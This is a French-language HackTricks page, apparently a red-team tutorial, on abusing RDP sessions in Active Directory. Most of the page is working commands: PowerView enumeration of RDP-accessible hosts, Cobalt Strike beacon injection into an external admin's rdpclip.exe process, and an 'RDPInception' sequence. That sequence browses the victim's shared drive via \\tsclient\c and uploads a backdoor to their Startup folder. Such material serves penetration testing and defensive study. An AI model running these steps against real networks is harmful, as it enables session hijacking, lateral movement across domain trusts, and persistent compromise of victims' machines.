hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
2023-06-03 13:10:46 +00:00

4.6 KiB

Abus de sessions RDP

Si le groupe externe a accès RDP à n'importe quel ordinateur dans le domaine actuel, un attaquant pourrait compromettre cet ordinateur et attendre.

Une fois que cet utilisateur a accédé via RDP, l'attaquant peut pivoter vers la session de cet utilisateur et abuser de ses permissions dans le domaine externe.

# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
 PID   PPID  Name                         Arch  Session     User
 ---   ----  ----                         ----  -------     -----
 ...
 4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user

Vérifiez d'autres façons de voler des sessions avec d'autres outils sur cette page.

RDPInception

Si un utilisateur accède via RDP à une machine où un attaquant l'attend, l'attaquant pourra injecter un beacon dans la session RDP de l'utilisateur et si la victime a monté son disque lors de l'accès via RDP, l'attaquant pourrait y accéder.

Dans ce cas, vous pourriez simplement compromettre l'ordinateur d'origine de la victime en écrivant une backdoor dans le dossier de démarrage.

# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin

# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
 PID   PPID  Name                         Arch  Session     User
 ---   ----  ----                         ----  -------     -----
 ...
 4960  1012  rdpclip.exe                  x64   3           EXT\super.admin

beacon> inject 4960 x64 tcp-local

# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     02/10/2021 04:11:30   $Recycle.Bin
          dir     02/10/2021 03:23:44   Boot
          dir     02/20/2021 10:15:23   Config.Msi
          dir     10/18/2016 01:59:39   Documents and Settings
          [...]

# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥